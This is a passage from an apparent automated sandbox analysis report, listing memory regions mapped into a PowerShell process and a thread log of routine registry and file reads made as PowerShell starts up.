| ntshrui.dll | 0x74d60000 | 0x74dcffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74dd0000 | 0x74ec4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74ed0000 | 0x7506dfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x750d0000 | 0x7511afff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x75120000 | 0x751a0fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x75350000 | 0x75368fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x75370000 | 0x75378fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x75380000 | 0x753a4fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x75390000 | 0x753bdfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x753b0000 | 0x753b8fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x753c0000 | 0x7540bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x75410000 | 0x75430fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x75440000 | 0x75489fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x75490000 | 0x754a3fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x754c0000 | 0x754d6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x754e0000 | 0x7551afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75520000 | 0x75535fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 49 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0x358
569
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
12 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
